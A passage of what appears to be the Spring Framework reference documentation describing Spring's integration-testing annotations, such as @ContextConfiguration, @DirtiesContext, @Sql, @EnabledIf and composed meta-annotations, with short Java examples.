`deleteFromTableWhere(..)`: deletes rows from the given table, using the provided\n`WHERE` clause\n* `dropTables(..)`: drops the specified tables\n\n__Note that <<testcontext-support-classes-junit4,\n`AbstractTransactionalJUnit4SpringContextTests`>> and\n<<testcontext-support-classes-testng, `AbstractTransactionalTestNGSpringContextTests`>>\nprovide convenience methods which delegate to the aforementioned methods in\n`JdbcTestUtils`.__\n\nThe `spring-jdbc` module provides support for configuring and launching an embedded\ndatabase which can be used in integration tests that interact with a database. For\ndetails, see <<data-access.adoc#jdbc-embedded-database-support, Embedded database support>>\nand <<data-access.adoc#jdbc-embedded-database-dao-testing, Testing data access logic\nwith an embedded database>>.\n\n\n\n[[integration-testing-annotations]]\n=== Annotations\n\n\n[[integration-testing-annotations-spring]]\n==== Spring Testing Annotations\nThe Spring Framework provides the following set of __Spring-specific__ annotations that\nyou can use in your unit and integration tests in conjunction with the TestContext\nframework. Refer to the corresponding javadocs for further information, including\ndefault attribute values, attribute aliases, and so on.\n\n===== @BootstrapWith\n`@BootstrapWith` is a class-level annotation that is used to configure how the _Spring\nTestContext Framework_ is bootstrapped. Specifically, `@BootstrapWith` is used to specify\na custom `TestContextBootstrapper`. Consult the <<testcontext-bootstrapping,Bootstrapping\nthe TestContext framework>> section for further details.\n\n===== @ContextConfiguration\n`@ContextConfiguration` defines class-level metadata that is used to determine how to\nload and configure an `ApplicationContext` for integration tests. Specifically,\n`@ContextConfiguration` declares the application context resource `locations` or the\nannotated `classes` that will be used to load the context.\n\nResource locations are typically XML configuration files or Groovy scripts located in\nthe classpath; whereas, annotated classes are typically `@Configuration` classes. However,\nresource locations can also refer to files and scripts in the file system, and annotated\nclasses can be component classes, etc.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(\"\/test-config.xml\")\n\tpublic class XmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**classes** = TestConfig.class)\n\tpublic class ConfigClassApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\nAs an alternative or in addition to declaring resource locations or annotated classes,\n`@ContextConfiguration` may be used to declare `ApplicationContextInitializer` classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**initializers** = CustomContextIntializer.class)\n\tpublic class ContextInitializerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` may optionally be used to declare the `ContextLoader` strategy\nas well. Note, however, that you typically do not need to explicitly configure the\nloader since the default loader supports either resource `locations` or annotated\n`classes` as well as `initializers`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**(**locations** = \"\/test-context.xml\", **loader** = CustomContextLoader.class)\n\tpublic class CustomLoaderXmlApplicationContextTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ContextConfiguration` provides support for __inheriting__ resource locations or\nconfiguration classes as well as context initializers declared by superclasses by\ndefault.\n====\n\nSee <<testcontext-ctx-management>> and the `@ContextConfiguration` javadocs for\nfurther details.\n\n===== @WebAppConfiguration\n`@WebAppConfiguration` is a class-level annotation that is used to declare that the\n`ApplicationContext` loaded for an integration test should be a `WebApplicationContext`.\nThe mere presence of `@WebAppConfiguration` on a test class ensures that a\n`WebApplicationContext` will be loaded for the test, using the default value of\n`\"file:src\/main\/webapp\"` for the path to the root of the web application (i.e., the\n__resource base path__). The resource base path is used behind the scenes to create a\n`MockServletContext` which serves as the `ServletContext` for the test's\n`WebApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nTo override the default, specify a different base resource path via the __implicit__\n`value` attribute. Both `classpath:` and `file:` resource prefixes are supported. If no\nresource prefix is supplied the path is assumed to be a file system resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@WebAppConfiguration(\"classpath:test-web-resources\")**\n\tpublic class WebAppTests {\n\t\t\/\/ class body...\n\t}\n----\n\nNote that `@WebAppConfiguration` must be used in conjunction with\n`@ContextConfiguration`, either within a single test class or within a test class\nhierarchy. See the `@WebAppConfiguration` javadocs for further details.\n\n===== @ContextHierarchy\n`@ContextHierarchy` is a class-level annotation that is used to define a hierarchy of\n``ApplicationContext``s for integration tests. `@ContextHierarchy` should be declared\nwith a list of one or more `@ContextConfiguration` instances, each of which defines a\nlevel in the context hierarchy. The following examples demonstrate the use of\n`@ContextHierarchy` within a single test class; however, `@ContextHierarchy` can also be\nused within a test class hierarchy.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class ContextHierarchyTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = AppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class WebIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you need to merge or override the configuration for a given level of the context\nhierarchy within a test class hierarchy, you must explicitly name that level by\nsupplying the same value to the `name` attribute in `@ContextConfiguration` at each\ncorresponding level in the class hierarchy. See\n<<testcontext-ctx-management-ctx-hierarchies>> and the `@ContextHierarchy` javadocs\nfor further examples.\n\n===== @ActiveProfiles\n`@ActiveProfiles` is a class-level annotation that is used to declare which __bean\ndefinition profiles__ should be active when loading an `ApplicationContext` for an\nintegration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**(\"dev\")\n\tpublic class DeveloperTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@ActiveProfiles**({\"dev\", \"integration\"})\n\tpublic class DeveloperIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[NOTE]\n====\n`@ActiveProfiles` provides support for __inheriting__ active bean definition profiles\ndeclared by superclasses by default. It is also possible to resolve active bean\ndefinition profiles programmatically by implementing a custom\n<<testcontext-ctx-management-env-profiles-ActiveProfilesResolver,`ActiveProfilesResolver`>>\nand registering it via the `resolver` attribute of `@ActiveProfiles`.\n====\n\nSee <<testcontext-ctx-management-env-profiles>> and the `@ActiveProfiles` javadocs\nfor examples and further details.\n\n===== @TestPropertySource\n`@TestPropertySource` is a class-level annotation that is used to configure the locations\nof properties files and inlined properties to be added to the set of `PropertySources` in\nthe `Environment` for an `ApplicationContext` loaded for an integration test.\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nThe following example demonstrates how to declare a properties file from the classpath.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\nThe following example demonstrates how to declare _inlined_ properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestPropertySource**(properties = { \"timezone = GMT\", \"port: 4242\" })\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @DirtiesContext\n`@DirtiesContext` indicates that the underlying Spring `ApplicationContext` has been\n__dirtied__ during the execution of a test (i.e., modified or corrupted in some manner --\nfor example, by changing the state of a singleton bean) and should be closed. When an\napplication context is marked __dirty__, it is removed from the testing framework's cache\nand closed. As a consequence, the underlying Spring container will be rebuilt for any\nsubsequent test that requires a context with the same configuration metadata.\n\n`@DirtiesContext` can be used as both a class-level and method-level annotation within\nthe same class or class hierarchy. In such scenarios, the `ApplicationContext` is marked\nas __dirty__ before or after any such annotated method as well as before or after the\ncurrent test class, depending on the configured `methodMode` and `classMode`.\n\nThe following examples explain when the context would be dirtied for various\nconfiguration scenarios:\n\n* Before the current test class, when declared on a class with class mode set to\n`BEFORE_CLASS`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_CLASS)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After the current test class, when declared on a class with class mode set to\n`AFTER_CLASS` (i.e., the default class mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before each test method in the current test class, when declared on a class with class\nmode set to `BEFORE_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = BEFORE_EACH_TEST_METHOD)**\n\tpublic class FreshContextTests {\n\t\t\/\/ some tests that require a new Spring container\n\t}\n----\n\n+\n\n* After each test method in the current test class, when declared on a class with class\nmode set to `AFTER_EACH_TEST_METHOD.`\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(classMode = AFTER_EACH_TEST_METHOD)**\n\tpublic class ContextDirtyingTests {\n\t\t\/\/ some tests that result in the Spring container being dirtied\n\t}\n----\n\n+\n\n* Before the current test, when declared on a method with the method mode set to\n`BEFORE_METHOD`.\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext(methodMode = BEFORE_METHOD)**\n\t@Test\n\tpublic void testProcessWhichRequiresFreshAppCtx() {\n\t\t\/\/ some logic that requires a new Spring container\n\t}\n----\n\n+\n\n* After the current test, when declared on a method with the method mode set to\n`AFTER_METHOD` (i.e., the default method mode).\n\n+\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@DirtiesContext**\n\t@Test\n\tpublic void testProcessWhichDirtiesAppCtx() {\n\t\t\/\/ some logic that results in the Spring container being dirtied\n\t}\n----\n\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy via `@ContextHierarchy`, the `hierarchyMode` flag can be used to control how\nthe context cache is cleared. By default an __exhaustive__ algorithm will be used that\nclears the context cache including not only the current level but also all other context\nhierarchies that share an ancestor context common to the current test; all\n``ApplicationContext``s that reside in a sub-hierarchy of the common ancestor context\nwill be removed from the context cache and closed. If the __exhaustive__ algorithm is\noverkill for a particular use case, the simpler __current level__ algorithm can be\nspecified instead, as seen below.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(\"\/parent-config.xml\"),\n\t\t@ContextConfiguration(\"\/child-config.xml\")\n\t})\n\tpublic class BaseTests {\n\t\t\/\/ class body...\n\t}\n\n\tpublic class ExtendedTests extends BaseTests {\n\n\t\t@Test\n\t\t@DirtiesContext(**hierarchyMode = CURRENT_LEVEL**)\n\t\tpublic void test() {\n\t\t\t\/\/ some logic that results in the child context being dirtied\n\t\t}\n\t}\n----\n\nFor further details regarding the `EXHAUSTIVE` and `CURRENT_LEVEL` algorithms see the\n`DirtiesContext.HierarchyMode` javadocs.\n\n===== @TestExecutionListeners\n`@TestExecutionListeners` defines class-level metadata for configuring the\n`TestExecutionListener` implementations that should be registered with the\n`TestContextManager`. Typically, `@TestExecutionListeners` is used in conjunction with\n`@ContextConfiguration`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t**@TestExecutionListeners**({CustomTestExecutionListener.class, AnotherTestExecutionListener.class})\n\tpublic class CustomTestExecutionListenerTests {\n\t\t\/\/ class body...\n\t}\n----\n\n`@TestExecutionListeners` supports _inherited_ listeners by default. See the javadocs\nfor an example and further details.\n\n===== @Commit\n`@Commit` indicates that the transaction for a transactional test method should be\n__committed__ after the test method has completed. `@Commit` can be used as a direct\nreplacement for `@Rollback(false)` in order to more explicitly convey the intent of the\ncode. Analogous to `@Rollback`, `@Commit` may also be declared as a class-level or\nmethod-level annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Commit**\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @Rollback\n`@Rollback` indicates whether the transaction for a transactional test method should be\n__rolled back__ after the test method has completed. If `true`, the transaction is rolled\nback; otherwise, the transaction is committed (see also `@Commit`). Rollback semantics\nfor integration tests in the Spring TestContext Framework default to `true` even if\n`@Rollback` is not explicitly declared.\n\nWhen declared as a class-level annotation, `@Rollback` defines the default rollback\nsemantics for all test methods within the test class hierarchy. When declared as a\nmethod-level annotation, `@Rollback` defines rollback semantics for the specific test\nmethod, potentially overriding class-level `@Rollback` or `@Commit` semantics.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Rollback**(false)\n\t@Test\n\tpublic void testProcessWithoutRollback() {\n\t\t\/\/ ...\n\t}\n----\n\n===== @BeforeTransaction\n`@BeforeTransaction` indicates that the annotated `void` method should be executed\n__before__ a transaction is started for test methods configured to run within a\ntransaction via Spring's `@Transactional` annotation. As of Spring Framework 4.3,\n`@BeforeTransaction` methods are not required to be `public` and may be declared on Java\n8 based interface default methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@BeforeTransaction**\n\tvoid beforeTransaction() {\n\t\t\/\/ logic to be executed before a transaction is started\n\t}\n----\n\n===== @AfterTransaction\n`@AfterTransaction` indicates that the annotated `void` method should be executed\n__after__ a transaction is ended for test methods configured to run within a transaction\nvia Spring's `@Transactional` annotation. As of Spring Framework 4.3, `@AfterTransaction`\nmethods are not required to be `public` and may be declared on Java 8 based interface\ndefault methods.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@AfterTransaction**\n\tvoid afterTransaction() {\n\t\t\/\/ logic to be executed after a transaction has ended\n\t}\n----\n\n===== @Sql\n`@Sql` is used to annotate a test class or test method to configure SQL scripts to be\nexecuted against a given database during integration tests.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@Sql**({\"\/test-schema.sql\", \"\/test-user-data.sql\"})\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test schema and test data\n\t}\n----\n\nSee <<testcontext-executing-sql-declaratively>> for further details.\n\n===== @SqlConfig\n`@SqlConfig` defines metadata that is used to determine how to parse and execute SQL\nscripts configured via the `@Sql` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t@Sql(\n\t\tscripts = \"\/test-user-data.sql\",\n\t\tconfig = **@SqlConfig**(commentPrefix = \"`\", separator = \"@@\")\n\t)\n\tpublic void userTest {\n\t\t\/\/ execute code that relies on the test data\n\t}\n----\n\n===== @SqlGroup\n`@SqlGroup` is a container annotation that aggregates several `@Sql` annotations.\n`@SqlGroup` can be used natively, declaring several nested `@Sql` annotations, or it can\nbe used in conjunction with Java 8's support for repeatable annotations, where `@Sql` can\nsimply be declared several times on the same class or method, implicitly generating this\ncontainer annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Test\n\t**@SqlGroup**({\n\t\t@Sql(scripts = \"\/test-schema.sql\", config = @SqlConfig(commentPrefix = \"`\")),\n\t\t@Sql(\"\/test-user-data.sql\")\n\t)}\n\tpublic void userTest {\n\t\t\/\/ execute code that uses the test schema and test data\n\t}\n----\n\n\n[[integration-testing-annotations-standard]]\n==== Standard Annotation Support\nThe following annotations are supported with standard semantics for all configurations\nof the Spring TestContext Framework. Note that these annotations are not specific to\ntests and can be used anywhere in the Spring Framework.\n\n* `@Autowired`\n* `@Qualifier`\n* `@Resource` (javax.annotation) _if JSR-250 is present_\n* `@ManagedBean` (javax.annotation) _if JSR-250 is present_\n* `@Inject` (javax.inject) _if JSR-330 is present_\n* `@Named` (javax.inject) _if JSR-330 is present_\n* `@PersistenceContext` (javax.persistence) _if JPA is present_\n* `@PersistenceUnit` (javax.persistence) _if JPA is present_\n* `@Required`\n* `@Transactional`\n\n.JSR-250 Lifecycle Annotations\n[NOTE]\n====\nIn the Spring TestContext Framework `@PostConstruct` and `@PreDestroy` may be used with\nstandard semantics on any application components configured in the `ApplicationContext`;\nhowever, these lifecycle annotations have limited usage within an actual test class.\n\nIf a method within a test class is annotated with `@PostConstruct`, that method will be\nexecuted before any __before__ methods of the underlying test framework (e.g., methods\nannotated with JUnit Jupiter's `@BeforeEach`), and that will apply for every test method\nin the test class. On the other hand, if a method within a test class is annotated with\n`@PreDestroy`, that method will __never__ be executed. Within a test class it is\ntherefore recommended to use test lifecycle callbacks from the underlying test framework\ninstead of `@PostConstruct` and `@PreDestroy`.\n====\n\n\n[[integration-testing-annotations-junit4]]\n==== Spring JUnit 4 Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit4-runner,SpringRunner>>, <<testcontext-junit4-rules,Spring's JUnit\n4 rules>>, or <<testcontext-support-classes-junit4,Spring's JUnit 4 support classes>>.\n\n===== @IfProfileValue\n`@IfProfileValue` indicates that the annotated test is enabled for a specific testing\nenvironment. If the configured `ProfileValueSource` returns a matching `value` for the\nprovided `name`, the test is enabled. Otherwise, the test will be disabled and\neffectively _ignored_.\n\n`@IfProfileValue` can be applied at the class level, the method level, or both.\nClass-level usage of `@IfProfileValue` takes precedence over method-level usage for any\nmethods within that class or its subclasses. Specifically, a test is enabled if it is\nenabled both at the class level _and_ at the method level; the absence of\n`@IfProfileValue` means the test is implicitly enabled. This is analogous to the\nsemantics of JUnit 4's `@Ignore` annotation, except that the presence of `@Ignore` always\ndisables a test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"java.vendor\", **value**=\"Oracle Corporation\")\n\t@Test\n\tpublic void testProcessWhichRunsOnlyOnOracleJvm() {\n\t\t\/\/ some logic that should run only on Java VMs from Oracle Corporation\n\t}\n----\n\nAlternatively, you can configure `@IfProfileValue` with a list of `values` (with __OR__\nsemantics) to achieve TestNG-like support for __test groups__ in a JUnit 4 environment.\nConsider the following example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@IfProfileValue**(**name**=\"test-groups\", **values**={\"unit-tests\", \"integration-tests\"})\n\t@Test\n\tpublic void testProcessWhichRunsForUnitOrIntegrationTestGroups() {\n\t\t\/\/ some logic that should run only for unit and integration test groups\n\t}\n----\n\n===== @ProfileValueSourceConfiguration\n`@ProfileValueSourceConfiguration` is a class-level annotation that specifies what type\nof `ProfileValueSource` to use when retrieving __profile values__ configured through the\n`@IfProfileValue` annotation. If `@ProfileValueSourceConfiguration` is not declared for a\ntest, `SystemProfileValueSource` is used by default.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ProfileValueSourceConfiguration**(CustomProfileValueSource.class)\n\tpublic class CustomProfileValueSourceTests {\n\t\t\/\/ class body...\n\t}\n----\n\n===== @Timed\n`@Timed` indicates that the annotated test method must finish execution in a specified\ntime period (in milliseconds). If the text execution time exceeds the specified time\nperiod, the test fails.\n\nThe time period includes execution of the test method itself, any repetitions of the\ntest (see `@Repeat`), as well as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Timed**(millis=1000)\n\tpublic void testProcessWithOneSecondTimeout() {\n\t\t\/\/ some logic that should not take longer than 1 second to execute\n\t}\n----\n\nSpring's `@Timed` annotation has different semantics than JUnit 4's `@Test(timeout=...)`\nsupport. Specifically, due to the manner in which JUnit 4 handles test execution timeouts\n(that is, by executing the test method in a separate `Thread`), `@Test(timeout=...)`\npreemptively fails the test if the test takes too long. Spring's `@Timed`, on the other\nhand, does not preemptively fail the test but rather waits for the test to complete\nbefore failing.\n\n===== @Repeat\n`@Repeat` indicates that the annotated test method must be executed repeatedly. The\nnumber of times that the test method is to be executed is specified in the annotation.\n\nThe scope of execution to be repeated includes execution of the test method itself as\nwell as any __set up__ or __tear down__ of the test fixture.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@Repeat**(10)\n\t@Test\n\tpublic void testProcessRepeatedly() {\n\t\t\/\/ ...\n\t}\n----\n\n[[integration-testing-annotations-junit-jupiter]]\n==== Spring JUnit Jupiter Testing Annotations\n\nThe following annotations are __only__ supported when used in conjunction with the\n<<testcontext-junit-jupiter-extension,`SpringExtension`>> and JUnit Jupiter (i.e., the\nprogramming model in JUnit 5).\n\n===== @SpringJUnitConfig\n\n`@SpringJUnitConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` from\nthe Spring TestContext Framework. It can be used at the class level as a drop-in\nreplacement for `@ContextConfiguration`. With regard to configuration options, the only\ndifference between `@ContextConfiguration` and `@SpringJUnitConfig` is that annotated\nclasses may be declared via the `value` attribute in `@SpringJUnitConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitConfig` and\n`@ContextConfiguration` for further details.\n\n===== @SpringJUnitWebConfig\n\n`@SpringJUnitWebConfig` is a _composed annotation_ that combines\n`@ExtendWith(SpringExtension.class)` from JUnit Jupiter with `@ContextConfiguration` and\n`@WebAppConfiguration` from the Spring TestContext Framework. It can be used at the class\nlevel as a drop-in replacement for `@ContextConfiguration` and `@WebAppConfiguration`.\nWith regard to configuration options, the only difference between `@ContextConfiguration`\nand `@SpringJUnitWebConfig` is that annotated classes may be declared via the `value`\nattribute in `@SpringJUnitWebConfig`. In addition, the `value` attribute from\n`@WebAppConfiguration` can only be overridden via the `resourcePath` attribute in\n`@SpringJUnitWebConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(TestConfig.class)\n\tclass ConfigurationClassJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SpringJUnitWebConfig**(**locations** = \"\/test-config.xml\")\n\tclass XmlJUnitJupiterSpringWebTests {\n\t\t\/\/ class body...\n\t}\n----\n\nSee <<testcontext-ctx-management>> as well as the javadocs for `@SpringJUnitWebConfig`,\n`@ContextConfiguration`, and `@WebAppConfiguration` for further details.\n\n===== @EnabledIf\n\n`@EnabledIf` is used to signal that the annotated JUnit Jupiter test class or test method\nis _enabled_ and should be executed if the supplied `expression` evaluates to `true`.\nSpecifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal to\n`\"true\"` (ignoring case), the test will be __enabled__. When applied at the class level,\nall test methods within that class are automatically enabled by default as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@EnabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@EnabledIf(\"${smoke.tests.enabled}\")`\n* Text literal \u2013 for example:\n - `@EnabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@EnabledIf(\"false\")` is equivalent\nto `@Disabled` and `@EnabledIf(\"true\")` is logically meaningless.\n\n`@EnabledIf` may be used as a meta-annotation to create custom composed annotations. For\nexample, a custom `@EnabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@EnabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Enabled on Mac OS\"\n)\npublic @interface EnabledOnMac {}\n----\n\n===== @DisabledIf\n\n`@DisabledIf` is used to signal that the annotated JUnit Jupiter test class or test\nmethod is _disabled_ and should not be executed if the supplied `expression` evaluates to\n`true`. Specifically, if the expression evaluates to `Boolean.TRUE` or a `String` equal\nto `\"true\"` (ignoring case), the test will be __disabled__. When applied at the class\nlevel, all test methods within that class are automatically disabled as well.\n\nExpressions can be any of the following.\n\n* <<core.adoc#expressions,Spring Expression Language>> (SpEL) expression \u2013 for example:\n - `@DisabledIf(\"#{systemProperties['os.name'].toLowerCase().contains('mac')}\")`\n* Placeholder for a property available in the Spring\n <<core.adoc#beans-environment,`Environment`>> \u2013 for example:\n - `@DisabledIf(\"${smoke.tests.disabled}\")`\n* Text literal \u2013 for example:\n - `@DisabledIf(\"true\")`\n\nNote, however, that a text literal which is _not_ the result of dynamic resolution of a\nproperty placeholder is of zero practical value since `@DisabledIf(\"true\")` is\nequivalent to `@Disabled` and `@DisabledIf(\"false\")` is logically meaningless.\n\n`@DisabledIf` may be used as a meta-annotation to create custom composed annotations. For\nexample, a custom `@DisabledOnMac` annotation can be created as follows.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n@Target({ ElementType.TYPE, ElementType.METHOD })\n@Retention(RetentionPolicy.RUNTIME)\n@DisabledIf(\n expression = \"#{systemProperties['os.name'].toLowerCase().contains('mac')}\",\n reason = \"Disabled on Mac OS\"\n)\npublic @interface DisabledOnMac {}\n----\n\n\n[[integration-testing-annotations-meta]]\n==== Meta-Annotation Support for Testing\nIt is possible to use most test-related annotations as\n<<core.adoc#beans-meta-annotations,meta-annotations>> in order to create custom _composed\nannotations_ and reduce configuration duplication across a test suite.\n\nEach of the following may be used as meta-annotations in conjunction with the\n<<testcontext-framework,TestContext framework>>.\n\n* `@BootstrapWith`\n* `@ContextConfiguration`\n* `@ContextHierarchy`\n* `@ActiveProfiles`\n* `@TestPropertySource`\n* `@DirtiesContext`\n* `@WebAppConfiguration`\n* `@TestExecutionListeners`\n* `@Transactional`\n* `@BeforeTransaction`\n* `@AfterTransaction`\n* `@Commit`\n* `@Rollback`\n* `@Sql`\n* `@SqlConfig`\n* `@SqlGroup`\n* `@Repeat` _(only supported on JUnit 4)_\n* `@Timed` _(only supported on JUnit 4)_\n* `@IfProfileValue` _(only supported on JUnit 4)_\n* `@ProfileValueSourceConfiguration` _(only supported on JUnit 4)_\n* `@SpringJUnitConfig` _(only supported on JUnit Jupiter)_\n* `@SpringJUnitWebConfig` _(only supported on JUnit Jupiter)_\n* `@EnabledIf` _(only supported on JUnit Jupiter)_\n* `@DisabledIf` _(only supported on JUnit Jupiter)_\n\nFor example, if we discover that we are repeating the following configuration across our\n_JUnit 4_ based test suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic class UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_ that\ncentralizes the common test configuration for Spring like this:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tpublic @interface TransactionalDevTestConfig { }\n----\n\nThen we can use our custom `@TransactionalDevTestConfig` annotation to simplify the\nconfiguration of individual JUnit 4 based test classes as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class OrderRepositoryTests { }\n\n\t@RunWith(SpringRunner.class)\n\t@TransactionalDevTestConfig\n\tpublic class UserRepositoryTests { }\n----\n\nIf we are writing tests using JUnit Jupiter, we can reduce code duplication even further\nsince annotations in JUnit 5 can also be used as meta-annotations. For example, if we\ndiscover that we are repeating the following configuration across our JUnit Jupiter based\ntest suite...\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ExtendWith(SpringExtension.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tclass OrderRepositoryTests { }\n\n\t@ExtendWith(SpringExtension.class)\n\t@ContextConfiguration({\"\/app-config.xml\", \"\/test-data-access-config.xml\"})\n\t@ActiveProfiles(\"dev\")\n\t@Transactional\n\tclass UserRepositoryTests { }\n----\n\nWe can reduce the above duplication by introducing a custom _composed annotation_\nthat centralizes the common test configuration for Spring and JUnit Jupiter like 